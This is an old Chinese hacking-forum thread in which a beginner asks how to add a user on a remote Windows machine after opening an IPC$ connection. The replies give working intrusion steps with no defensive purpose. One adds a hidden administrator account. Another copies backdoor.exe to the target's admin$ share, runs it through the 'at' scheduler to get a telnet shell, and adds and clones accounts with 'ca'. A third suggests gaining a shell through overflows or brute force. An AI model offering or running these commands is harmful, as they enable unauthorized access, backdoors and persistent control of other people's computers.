论坛: 菜鸟乐园 标题: 关于IPC$连接的问题 复制本贴地址    
作者: syq2002syq [syq2002syq]    论坛用户   登录
我想请教一个问题:我和一台电脑成功进行IPC$连接后,用net user aaa aaa /add这个命令时添加的用户怎么会加在自己的电脑上的啊!?如果我想在已经建立连接的电脑上添加用户应该如何实现?谢谢!

地主 发表时间: 04-05-20 23:43

回复: fangjunlin [fangjunlin]   论坛用户   登录
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功,那么我们可以把他加入Administrator组了.

net localgroup Administrators heibai /add


B1层 发表时间: 04-05-20 23:46

回复: syq2002syq [syq2002syq]   论坛用户   登录
谢谢你的回复!可是我是这样先建立连接再建用户的啊!问题是建的用户位于自己的电脑上!
那我有什么用呢?

B2层 发表时间: 04-05-20 23:56

回复: uncracker [uncracker]   论坛用户   登录
在获得shell以后才能创建用户
你的IPC$如果是admin权限,可以按下面的步骤进行
copy backdoor.exe \\对方IP\admin$
net time \\对方IP
at \\对方IP 00:00 backdoor.exe 这里的时间要比用net time 的到的时间晚2分钟
过一会就可以telnet 到对方的机器了。
然后net use hacker hacker /add
net localgroup administrators hacker /add
另外我们可以看看对方的guest帐户是否开放,如果是禁用的可以用ca克隆
ca \\IP hacker hacker guest newpassword

B3层 发表时间: 04-05-21 00:07

回复: syq2002syq [syq2002syq]   论坛用户   登录
谢谢 uncracker .我明白了!

B4层 发表时间: 04-05-21 09:05

回复: yangliwei [yangliwei]   论坛用户   登录

net user 是创建用户的,
但由于楼主只是成功建立IPC连接,
但取得对方Shell,
或是登录到对方机器上,
才能用这个命令建立用户,

如何获得对方Shell呀?
可以用对方系统的漏洞进行溢出,
也可用扫,
或是用暴力破解!

好了!


B5层 发表时间: 04-05-21 10:47

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号